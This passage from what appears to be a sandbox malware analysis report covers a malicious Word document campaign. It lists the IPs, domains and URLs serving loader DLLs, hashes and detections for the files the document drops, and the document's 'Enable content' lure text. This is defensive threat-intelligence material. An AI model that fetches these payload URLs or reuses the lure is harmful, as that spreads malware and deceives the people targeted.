    • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
    64.227.108.27drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • alexbionka.com/
    6bd7001f4c269babd8470173c5176e31627fc97335cd9.dllGet hashmaliciousBrowse
    • alexbionka.com/
    ba5d10b61c66694419d31843cba8393a424b660df544f.dllGet hashmaliciousBrowse
    • alexbionka.com/
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • alexbionka.com/
    aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dllGet hashmaliciousBrowse
    • alexbionka.com/
    9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dllGet hashmaliciousBrowse
    • alexbionka.com/
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • alexbionka.com/
    agsilverfile08.11.docGet hashmaliciousBrowse
    • alexbionka.com/
    giveThereWhichCouldHis.dllGet hashmaliciousBrowse
    • qropalhouse.com/

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    alexbionka.comdrinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • 64.227.108.27
    6bd7001f4c269babd8470173c5176e31627fc97335cd9.dllGet hashmaliciousBrowse
    • 64.227.108.27
    ba5d10b61c66694419d31843cba8393a424b660df544f.dllGet hashmaliciousBrowse
    • 64.227.108.27
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 64.227.108.27
    aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dllGet hashmaliciousBrowse
    • 64.227.108.27
    9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dllGet hashmaliciousBrowse
    • 64.227.108.27
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 64.227.108.27
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 64.227.108.27

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    DIGITALOCEAN-ASNUSdrinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • 64.227.108.27
    6bd7001f4c269babd8470173c5176e31627fc97335cd9.dllGet hashmaliciousBrowse
    • 64.227.108.27
    ba5d10b61c66694419d31843cba8393a424b660df544f.dllGet hashmaliciousBrowse
    • 64.227.108.27
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 64.227.108.27
    aaffd5e2c3e894a71e9403fefc9b616d4786dc566e961.dllGet hashmaliciousBrowse
    • 64.227.108.27
    9d2a43276a3414bc1983c4f2546d5494b8c814bddf2dc.dllGet hashmaliciousBrowse
    • 64.227.108.27
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 64.227.108.27
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 64.227.108.27
    6220_719_pdf.exeGet hashmaliciousBrowse
    • 157.230.46.114
    https://express.adobe.com/page/lSwpTTu5FfBJB/Get hashmaliciousBrowse
    • 103.253.144.208
    3195021pdf.exeGet hashmaliciousBrowse
    • 157.230.46.114
    https://express.adobe.com/page/lSwpTTu5FfBJB/Get hashmaliciousBrowse
    • 103.253.144.208
    https://express.adobe.com/page/lSwpTTu5FfBJB/Get hashmaliciousBrowse
    • 103.253.144.208
    Secpralpro Order Q3 FTD52535345675 .vbsGet hashmaliciousBrowse
    • 157.245.84.137
    https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&Get hashmaliciousBrowse
    • 178.128.135.233
    https://oymlnc.sofie.cloud/download-file/4990a846-fff5-4c7e-a605-5c3216654216Get hashmaliciousBrowse
    • 142.93.97.249
    giveThereWhichCouldHis.dllGet hashmaliciousBrowse
    • 64.227.108.27
    aqua.mpslGet hashmaliciousBrowse
    • 178.62.131.198
    aqua.ppcGet hashmaliciousBrowse
    • 159.203.164.16
    http://polleev.com/Get hashmaliciousBrowse
    • 159.65.180.165
    VMAGE-ASRUdrinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 45.8.146.139
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 45.8.146.139
    GitmEGG60Q.exeGet hashmaliciousBrowse
    • 45.159.251.68
    80J4pAFU0A.exeGet hashmaliciousBrowse
    • 45.159.248.53
    Rwwsr82vkS.exeGet hashmaliciousBrowse
    • 45.159.248.53
    sJq1pykxns.exeGet hashmaliciousBrowse
    • 45.159.248.53
    3RkGCbnoKw.exeGet hashmaliciousBrowse
    • 45.159.248.53
    60MLnq8Uma.exeGet hashmaliciousBrowse
    • 45.159.248.53
    uGfpJynSWM.exeGet hashmaliciousBrowse
    • 45.159.249.4
    MqYQkpHt4V.exeGet hashmaliciousBrowse
    • 45.159.248.53
    0LYwkmJsgj.exeGet hashmaliciousBrowse
    • 45.159.248.53
    P5u1ZAL6wF.exeGet hashmaliciousBrowse
    • 45.159.248.53
    VbeTpPMvvK.exeGet hashmaliciousBrowse
    • 45.159.248.53
    e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
    • 45.159.248.53
    aTlGCwT504.exeGet hashmaliciousBrowse
    • 45.159.248.53
    a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
    • 45.159.248.53
    lFqE59erhf.exeGet hashmaliciousBrowse
    • 45.8.144.151
    eW9zvrPzHg.exeGet hashmaliciousBrowse
    • 45.159.251.105

    JA3 Fingerprints

    No context

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    C:\Users\user\AppData\Local\Temp\r9093.tmp.exedrinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
      dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
        feltenberger doc 08.11.docGet hashmaliciousBrowse
          agsilverfile08.11.docGet hashmaliciousBrowse
            ino.file.18.07.2022.docGet hashmaliciousBrowse
              md-srl.doc.29.07.22.docGet hashmaliciousBrowse
                [redacted]-document-26.07.22.docGet hashmaliciousBrowse
                  [redacted]-doc-26.07.docGet hashmaliciousBrowse
                    confinalp.file.26.07.22.docGet hashmaliciousBrowse
                      alhena-doc-26.07.2022.docGet hashmaliciousBrowse
                        andreademarchi invoice 26.07.22.docGet hashmaliciousBrowse
                          technographsri invoice 26.07.2022.docGet hashmaliciousBrowse
                            377155250.docGet hashmaliciousBrowse
                              pelagagge_doc_22.07.22.docGet hashmaliciousBrowse
                                12658371_dynamicom-invoice-18.07.22.docGet hashmaliciousBrowse
                                  [redacted],file,18.07.docGet hashmaliciousBrowse
                                    istitutomargherita.file.18.07.docGet hashmaliciousBrowse
                                      gruppobluecity invoice 18.07.22.docGet hashmaliciousBrowse
                                        bbdy_document_07.06.2022.docGet hashmaliciousBrowse
                                          tcrc-central-le file 07.01.22.docGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                            Category:downloaded
                                            Size (bytes):360448
                                            Entropy (8bit):4.669486804663653
                                            Encrypted:false
                                            SSDEEP:6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
                                            MD5:CE600629752CAF6529025A0EE60FB7B3
                                            SHA1:8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
                                            SHA-256:BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
                                            SHA-512:4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Reputation:low
                                            IE Cache URL:http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11977CC7.png

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PNG image data, 636 x 613, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):113730
                                            Entropy (8bit):7.990292786537194
                                            Encrypted:true
                                            SSDEEP:3072:ShIiMUFV26oUc72Dl+oj/Yc6oGqdxVJw0c8N2mirB0VZp:ShMggmEceUi8N2miK/
                                            MD5:E0B30095BE35E9494E5073277D4FC1A1
                                            SHA1:19D39B036989A331F5389E377FBE565436599894
                                            SHA-256:EA952A68D25232D981CDBE0CD6DA947A9386D4BFFD5D1BE2EF80C4A1246AC3E2
                                            SHA-512:A524907D5D60AA77DB0BA3A3BF114EA7F8AEA9190ADAA84A0C78F96EC8E333AB124D68C84863E83E735D602117B0F3422746C9C4A0D6823CC8B51B652C41972E
                                            Malicious:false
                                            Reputation:low
                                            Preview:.PNG........IHDR...|...e......V.R.. .IDATx.....4.......~..:..t."...$......d..+...%Y.,V.(...7...03"""..O.......?>..y.}.v.&u......?0.....g.NH.............F...$..H.........km.%"D .=.f;..........A....O..w..,"n...U....N~?".....'...7w)A..l.+.....7....q|..q.7?............v.f...6....x._<.On.WLm..>s<.-....."............"_..~a....f=..7.....P.~...,gD..:.P..,.*.....c...;.B...q..1.>|.....R.7m...7.......,".p7%.M.".:...9..P.8.!..?.... .)".......A..Z..rA.).g.7..'QD.......@$.....*..oC. .6w...lP...lN..1X...H.................q....X{.s..A......w..I....l`..t.C87.p.k...H>r...).,..n...Dd.R.c..xHs.nWv.......>.j.WCi........a...}.t\_....A.q..t..^A..Q..g.,..P.h.n.nm....7....YYT.............jl.....yR>s...w......|.z..L.....\.FP.....QG...0.....2...@T.*....C.....M...;...i....Y8...R.Y*....~.;.CA........q....6`......~......2.g."...../..{x.( ...o..p...YW&+//[...........]....h....s....&...m_.)tG...s....<...].R..w..!.....A;.....I.,\.I@...&.....0[.\a?..`.#2upVW.4.{..c.JMZ..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DB7145E.png

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):256595
                                            Entropy (8bit):7.978435362250102
                                            Encrypted:false
                                            SSDEEP:6144:qvnabj6CLx2b5lq77EL8D+NXLfaeW8JftIyhQfWS:Xbj6MxGPfq8SeS
                                            MD5:F99413369967D6AA9F566F87F36181E7
                                            SHA1:1BA1EB934E7F34344F99E558F6CE4723A13B375D
                                            SHA-256:F9CED4D80492BC27EBCE86308AF62DC228A5BDAB865F067F6869E74DD83EC6CF
                                            SHA-512:496ED10D5FFF3930C309B387042130CA94747F4ECDA72779772F73E7B1BF379411E76088EA8DC9A589085C91A18A30E9BE5D35FA4A8D85A01FB1C7FDD0DE7487
                                            Malicious:false
                                            Reputation:low
                                            Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^.....GU..,..:.=..3x.Q.!..AQ....... ..AA.!...fNB..C..@H..2H.......FA..!.Iw.w.I.Bz..}..z...J.....OR]U.V.........jp..%j.....A...e...*..o.mZu-.x..p.....M..Py.mx...Y......5\Q.2=...I.5\...."y+..RNO..t......ZT..OOF.u.~.......,.._y*..W...g..m=@.Od...IZ.K.6o.k]z<.**...C.O..VN....6.We.<m~.0V...o..z..@........L..A.-?y....1..EK..z.c...7i5.:..@..a......~.....X.....:....pE.S}..SQ..+..K7......?..C/..9....Si...%.4..[i-_u..+z.=.Y.........|m..{.<=.V.[.i....m.DK_)..p..,....t..W?Q.c<.Z...5.HZ...p:P..r.p.V$...S.W.3.h..-..7y2...Z..+.oQ..Ok..W..WZ".9@..6..$},}%...z..^][T..U......=z.g=.D.U~....H....].S.t`V<icu.../...R...[.-o..C/...o........Yi ......|`,..6....Goi..Z..1.D.k....Tb.4.........W..d.Mo.....je..z......m.6.WQ...[."i..X...ZT..O....{4....[dz.kQ.-o/\i..>P.Y.....x..xu..AK...W..D...+.W@...cy.x............a0....W.._.-*..V7.5=.-.:..{.2...p..5..O..W.K..^ZE.g.t

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{27A0920F-83BA-451C-A370-247C29EA575C}.tmp

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.6813929110754575
                                            Encrypted:false
                                            SSDEEP:192:XVKterkAle/rhCUxyi5aStkqkAle/rhCUxyi5aaK:Yt8kAle/l5Eint7kAle/l5Ei
                                            MD5:50DFFBAE40D88AC9BCE9B8764F700AF1
                                            SHA1:96CBDA6A084FEA97C3AF81199E1E37BEC442068B
                                            SHA-256:D48610288DC5FAA1C9604941C27291F911135D91B17F0CFFE351B382A5133E4C
                                            SHA-512:624AC8EC22A5C98318780BBF931971B4BA39CDD7D65DE9E680692D9F37DBFDEE98DAF4E6EFBE2C128963DBEA199EF3094F68426D2B64FBC104FDDDCAA9868D0B
                                            Malicious:false
                                            Reputation:low
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5E7AB36F-70CF-4FF1-BE43-961032978C36}.tmp

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):2.1282331468038365
                                            Encrypted:false
                                            SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lpakwkvPlI4Vle4S4Pll4eHkUZD/W4c:4LG1ND9Pxn82+kszJYtHsz
                                            MD5:F8CC4A5272D7AFF36E2EFF7EFD02E883
                                            SHA1:C4477C54081C7C2350D5DD090C9E18AF0693EEA2
                                            SHA-256:34ED4911C503F7AA0E4AFDA33EE4CFAD41E84EE533C92CDC6C061D1780D3FB59
                                            SHA-512:8032F5C3C86E83084A7618F50FB1CE9E135B2FE96749D435763E66404FE18040181421ED90C6A632290AE2C26AE76E9BC2F5164E94BA2E7756F5F2799265D8AB
                                            Malicious:false
                                            Reputation:low
                                            Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7180F76F-1528-4360-9534-25B0235971A3}.tmp

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\r9093.tmp.exe

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):44544
                                            Entropy (8bit):6.056689486584974
                                            Encrypted:false
                                            SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
                                            MD5:51138BEEA3E2C21EC44D0932C71762A8
                                            SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
                                            SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
                                            SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: drinkcodeblue.file.08.11.22.doc, Detection: malicious, Browse
                                            • Filename: dodsonimaging,file,08.11.2022.doc, Detection: malicious, Browse
                                            • Filename: feltenberger doc 08.11.doc, Detection: malicious, Browse
                                            • Filename: agsilverfile08.11.doc, Detection: malicious, Browse
                                            • Filename: ino.file.18.07.2022.doc, Detection: malicious, Browse
                                            • Filename: md-srl.doc.29.07.22.doc, Detection: malicious, Browse
                                            • Filename: [redacted]-document-26.07.22.doc, Detection: malicious, Browse
                                            • Filename: [redacted]-doc-26.07.doc, Detection: malicious, Browse
                                            • Filename: confinalp.file.26.07.22.doc, Detection: malicious, Browse
                                            • Filename: alhena-doc-26.07.2022.doc, Detection: malicious, Browse
                                            • Filename: andreademarchi invoice 26.07.22.doc, Detection: malicious, Browse
                                            • Filename: technographsri invoice 26.07.2022.doc, Detection: malicious, Browse
                                            • Filename: 377155250.doc, Detection: malicious, Browse
                                            • Filename: pelagagge_doc_22.07.22.doc, Detection: malicious, Browse
                                            • Filename: 12658371_dynamicom-invoice-18.07.22.doc, Detection: malicious, Browse
                                            • Filename: [redacted],file,18.07.doc, Detection: malicious, Browse
                                            • Filename: istitutomargherita.file.18.07.doc, Detection: malicious, Browse
                                            • Filename: gruppobluecity invoice 18.07.22.doc, Detection: malicious, Browse
                                            • Filename: bbdy_document_07.06.2022.doc, Detection: malicious, Browse
                                            • Filename: tcrc-central-le file 07.01.22.doc, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\y875E.tmp.dll

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):360448
                                            Entropy (8bit):4.669486804663653
                                            Encrypted:false
                                            SSDEEP:6144:tYCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:eCwMfjSlE+A4eguRJDtPZIG46FkEH9
                                            MD5:CE600629752CAF6529025A0EE60FB7B3
                                            SHA1:8D8DDA1D4FF66D6B5BB44F7BAFDC87EBB9B54DE6
                                            SHA-256:BDB9DAB286CCCCF1D315A027597065C51DC4BF0A87471B283FE749C146721C05
                                            SHA-512:4D2AC51A9AB38DCE21895A22878F6533C27371302A2F35C0F337FE05C3021CAA838D80C76DC7E4CA44D47E962973B52F2B4AA4C7BCD10E662DEA6C1645C05FE9
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\~DF612CB1A14F491B4E.TMP

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):60928
                                            Entropy (8bit):4.160079134971716
                                            Encrypted:false
                                            SSDEEP:768:Fv+gRWhfvDEgXn5UvkjzhDMGedfJMnrxbVDLtnDxSOT4vW2Gvw8MGKaUSh:FvKf75n5hzJM5dfJMnrzWlGdMGKaR
                                            MD5:F156F878AF6F57640ECE3F2C940DCDF1
                                            SHA1:25E9D1952D853CBD69494AC57D826BCD3BF70B7B
                                            SHA-256:B299E7ECB4D5B7C460DA311678E12E22164325B930FCAB02ED91E984D00ECF33
                                            SHA-512:35DAE312C241A66001822DADED91FFF0CE14075923F834F2420373F9DD5EE63B2DF68A7843085372E6FE3A4C3CF30E792F049CEA21AC02A4F58243CD3F87CF79
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...I...B...C...D...E...F...G...H...;...J...K...L...M...N...O...P...Q...R...S.......i...V...W...X...Y...Z...^...\...].......j...`.......b...c...d...e...f...g...h...[.......k...l...u...n...o...p...q...r...s...t..._.......................

                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\courtesyautomotivedoc08.11.LNK

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:38:17 2022, length=2256492, window=hide
                                            Category:dropped
                                            Size (bytes):1094
                                            Entropy (8bit):4.567016459408874
                                            Encrypted:false
                                            SSDEEP:12:8cJlgXg/XAlCPCHaXNBQtB/SxXX+W2G1bY5iFvicvbpAgSISxDtZ3YilMMEpxRl3:8cd/XT9SUo4ZF6eOXxDv3qsu7D
                                            MD5:16ACDC6C3148D948E793D54D0CC855F9
                                            SHA1:34618CE6E3713BF88184935233CCBFE78792AAD5
                                            SHA-256:4C9122002A5D221CF6EEDF9377D16251542447E8686FE514EBF0FFF21C483458
                                            SHA-512:219FFD7BD5632036B00F94BD7C9565600E172C997F1D560FB0809237E4DC2D2C05CF9C929FA350BD5D6B66C8A629797EFCB71655876D5BE68FFF4655032B307D
                                            Malicious:false
                                            Preview:L..................F.... ... d...3.. d...3..djT....ln"..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ln"..U.. .COURTE~1.DOC..j......hT..hT..*...r.....'...............c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\courtesyautomotivedoc08.11.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.o.u.r.t.e.s.y.a.u.t.o.m.o.t.i.v.e.d.o.c.0.8...1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....

                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):103
                                            Entropy (8bit):4.64907659762003
                                            Encrypted:false
                                            SSDEEP:3:bDuMJleLXRxcAgMCmX1dSxcAgMCv:bC9RxcSWxcSs
                                            MD5:096683A47B04CB33D2F0018C0B926F12
                                            SHA1:67871655DA0F274A618A1284B6C8FE5185CC0174
                                            SHA-256:542D2649FBB017DBA05E8AF20181C933F0FED51A2BC568323C4C123238505EC9
                                            SHA-512:4912E7A2160D08E75E39F025822D772471215030D75F6EA8D49DD5C828D9115D55B66EFF0D0CE94E4BE85DC2BEB6D6A77A3CEC36DEFEED77C9593D7047182020
                                            Malicious:false
                                            Preview:[folders]..Templates.LNK=0..courtesyautomotivedoc08.11.LNK=0..[doc]..courtesyautomotivedoc08.11.LNK=0..

                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.503835550707525
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                            MD5:7CFA404FD881AF8DF49EA584FE153C61
                                            SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                            SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                            SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                            Malicious:false
                                            Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                            Category:dropped
                                            Size (bytes):2
                                            Entropy (8bit):1.0
                                            Encrypted:false
                                            SSDEEP:3:Qn:Qn
                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                            Malicious:false
                                            Preview:..

                                            C:\Users\user\Desktop\~$urtesyautomotivedoc08.11.doc

                                            Download File
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.503835550707525
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                            MD5:7CFA404FD881AF8DF49EA584FE153C61
                                            SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                            SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
